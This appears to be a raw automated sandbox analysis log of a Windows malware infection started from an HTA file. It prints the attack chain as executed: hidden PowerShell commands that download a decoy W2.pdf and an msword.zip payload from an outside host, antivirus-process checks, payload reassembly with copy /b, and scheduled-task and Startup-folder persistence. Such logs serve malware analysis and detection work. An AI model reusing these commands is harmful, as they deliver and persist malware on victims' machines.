Dropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00B1FD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00B20DA0 appears 46 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winHTA@72/102@7/2

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B741FA GetLastError,FormatMessageW,

38_2_00B741FA

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B62010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		38_2_00B62010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B61A0B AdjustTokenPrivileges,CloseHandle,		38_2_00B61A0B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

12_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B6DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

38_2_00B6DD87

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_004024FB CoCreateInstance,

12_2_004024FB

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B73A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

38_2_00B73A0E

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\temp.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1720,i,5858866170035192879,1714130894212185246,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1720,i,5858866170035192879,1714130894212185246,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
